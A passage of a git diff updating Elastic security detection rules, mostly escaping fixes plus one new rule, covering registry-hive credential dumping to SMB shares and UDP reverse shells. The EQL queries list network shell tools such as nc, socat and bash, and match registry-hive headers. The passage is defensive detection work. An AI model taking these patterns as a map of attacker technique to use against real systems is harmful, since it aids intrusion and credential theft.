rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json index e43b4d9afe5..fd76e67405c 100644 --- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_104.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json index a78185e581a..36ee1213939 100644 --- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json index c13c7219bb5..3f999ce0558 100644 --- a/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a3ea12f3-0d4e-4667-8b44-4230c63f3c75_106.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "a3ea12f3-0d4e-4667-8b44-4230c63f3c75", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json index 13d3b3acd2b..e9e46820d35 100644 --- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_104.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Windows Registry File Creation in SMB Share", "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n", "references": [ "https://www.elastic.co/security-labs/detect-credential-access" ], @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json index 3ef78157c21..002d8dd9264 100644 --- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_105.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Windows Registry File Creation in SMB Share", "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n", "references": [ "https://www.elastic.co/security-labs/detect-credential-access" ], @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json index ea68cc2ae50..d8c771bad90 100644 --- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_106.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Windows Registry File Creation in SMB Share", "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\")\n", "references": [ "https://www.elastic.co/security-labs/detect-credential-access" ], @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json index c3892ca8016..5a617695f9f 100644 --- a/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a4c7473a-5cb4-4bc1-9d06-e4a75adbc494_107.json @@ -12,7 +12,7 @@ "license": "Elastic License v2", "name": "Windows Registry File Creation in SMB Share", "note": "## Triage and analysis\n\n### Investigating Windows Registry File Creation in SMB Share\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, as is the case for the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can try to evade detection on the host by transferring this data to a system that is not monitored to be parsed and decrypted. This rule identifies the creation or modification of a medium-size registry hive file on an SMB share, which may indicate this kind of exfiltration attempt.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Inspect the source host for suspicious or abnormal behaviors in the alert timeframe.\n- Capture the registry file(s) to determine the extent of the credential compromise in an eventual incident response.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes. Check whether the user should be performing this kind of activity and is aware of it.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size \u003e= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\") and\n not file.path : (\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT\",\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT.LASTGOOD.LOAD\",\n \"?:\\\\Windows\\\\Netwrix\\\\Temp\\\\????????.???.offreg\",\n \"?:\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.*\\\\Settings\\\\settings.dat*\"\n )\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n /* regf file header */\n file.Ext.header_bytes : \"72656766*\" and file.size >= 30000 and\n process.pid == 4 and user.id : (\"S-1-5-21*\", \"S-1-12-1-*\") and\n not file.path : (\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT\",\n \"?:\\\\*\\\\UPM_Profile\\\\NTUSER.DAT.LASTGOOD.LOAD\",\n \"?:\\\\Windows\\\\Netwrix\\\\Temp\\\\????????.???.offreg\",\n \"?:\\\\*\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.*\\\\Settings\\\\settings.dat*\"\n )\n", "references": [ "https://www.elastic.co/security-labs/detect-credential-access" ], @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json index bfe75a90d20..a067057a161 100644 --- a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json index a2f64e7b964..bfca23f4ae2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a52a9439-d52c-401c-be37-2785235c6547_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json index 1ecc06d2fb4..e74743356c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via UDP", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sample by host.id, process.pid, process.parent.pid\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"execve\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\",\n \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\",\n \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\")]\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"socket\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and auditd.data.a0 == \"2\" and auditd.data.a1 : (\"2\", \"802\")]\n[network where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"connect\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and network.direction == \"egress\" and destination.ip != null and \n destination.ip != \"127.0.0.1\" and destination.ip != \"127.0.0.53\" and destination.ip != \"::1\"]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" @@ -83,7 +83,7 @@ ], "risk_score": 47, "rule_id": "a5eb21b7-13cc-4b94-9fe2-29bb2914e037", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "OS: Linux", @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json index 3834485276b..2b3a1b06f6b 100644 --- a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_2.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json index 9e575989545..eb8b03a9427 100644 --- a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_3.json @@ -92,7 +92,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4.json b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4.json new file mode 100644 index 00000000000..29006eb1d7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a5eb21b7-13cc-4b94-9fe2-29bb2914e037_4.json @@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via UDP", + "query": "sample by host.id, process.pid, process.parent.pid\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"execve\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\",\n \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\",\n \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\")]\n[process where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"socket\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and auditd.data.a0 == \"2\" and auditd.data.a1 : (\"2\", \"802\")]\n[network where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"connect\" and process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\",\n \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\", \"ruby\", \"openssl\",\n \"awk\", \"telnet\", \"lua*\", \"socat\") and network.direction == \"egress\" and destination.ip != null and \n destination.ip != \"127.0.0.1\" and destination.ip != \"127.0.0.53\" and destination.ip != \"::1\"]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a1", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + 